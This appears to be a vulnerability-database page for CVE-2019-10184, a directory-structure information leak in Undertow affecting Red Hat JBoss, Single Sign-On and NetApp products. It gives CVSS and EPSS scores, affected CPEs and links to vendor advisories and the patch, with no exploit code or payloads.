Vulnerability Details : CVE-2019-10184
undertow before version 2.0.23.Final is vulnerable to an information leak issue. Web apps may have their directory structures predicted through requests without trailing slashes via the api.
Products affected by CVE-2019-10184
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:-:*:*:*:text-only:*:*:*
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.4:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:undertow:*:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:jboss_data_grid:-:*:*:*:text-only:*:*:*
- cpe:2.3:a:redhat:single_sign-on:-:*:*:*:text-only:*:*:*
- cpe:2.3:a:redhat:single_sign-on:7.3:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:openshift_application_runtimes:1.0:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:openshift_application_runtimes:-:*:*:*:text-only:*:*:*
- cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*
- cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*
- cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*
Threat overview for CVE-2019-10184
Top countries where our scanners detected CVE-2019-10184
Top open port discovered on systems with this issue
80
IPs affected by CVE-2019-10184 5,043
Threat actors abusing to this issue?
Yes
Find out if you* are
affected by CVE-2019-10184!
*Directly or indirectly through your vendors, service providers and 3rd parties.
Powered by
attack surface intelligence
from SecurityScorecard.
Exploit prediction scoring system (EPSS) score for CVE-2019-10184
0.67%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 80 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2019-10184
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
5.0
|
MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
10.0
|
2.9
|
NIST | |
5.3
|
MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
3.9
|
1.4
|
Red Hat, Inc. | |
7.5
|
HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
3.9
|
3.6
|
NIST |
CWE ids for CVE-2019-10184
-
The product does not perform an authorization check when an actor attempts to access a resource or perform an action.Assigned by:
- nvd@nist.gov (Primary)
- secalert@redhat.com (Secondary)
References for CVE-2019-10184
-
https://access.redhat.com/errata/RHSA-2019:2998
RHSA-2019:2998 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://access.redhat.com/errata/RHSA-2019:3045
RHSA-2019:3045 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://access.redhat.com/errata/RHSA-2019:2936
RHSA-2019:2936 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://access.redhat.com/errata/RHSA-2019:3044
RHSA-2019:3044 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://github.com/undertow-io/undertow/pull/794
[UNDERTOW-1578] 401 Unauthorized should be returned when requesting a protected directory without trailing slash by gaol · Pull Request #794 · undertow-io/undertow · GitHubPatch;Third Party Advisory
-
https://security.netapp.com/advisory/ntap-20220210-0016/
CVE-2019-10184 Undertow Vulnerability in NetApp Products | NetApp Product SecurityThird Party Advisory
-
https://access.redhat.com/errata/RHSA-2019:3050
RHSA-2019:3050 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://access.redhat.com/errata/RHSA-2019:2935
RHSA-2019:2935 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10184
1713068 – (CVE-2019-10184) CVE-2019-10184 undertow: Information leak in requests for directories without trailing slashesIssue Tracking;Vendor Advisory
-
https://access.redhat.com/errata/RHSA-2019:2937
RHSA-2019:2937 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://access.redhat.com/errata/RHSA-2019:3046
RHSA-2019:3046 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://access.redhat.com/errata/RHSA-2019:2938
RHSA-2019:2938 - Security Advisory - Red Hat Customer PortalVendor Advisory
-
https://access.redhat.com/errata/RHSA-2020:0727
RHSA-2020:0727 - Security Advisory - Red Hat Customer PortalVendor Advisory
Jump to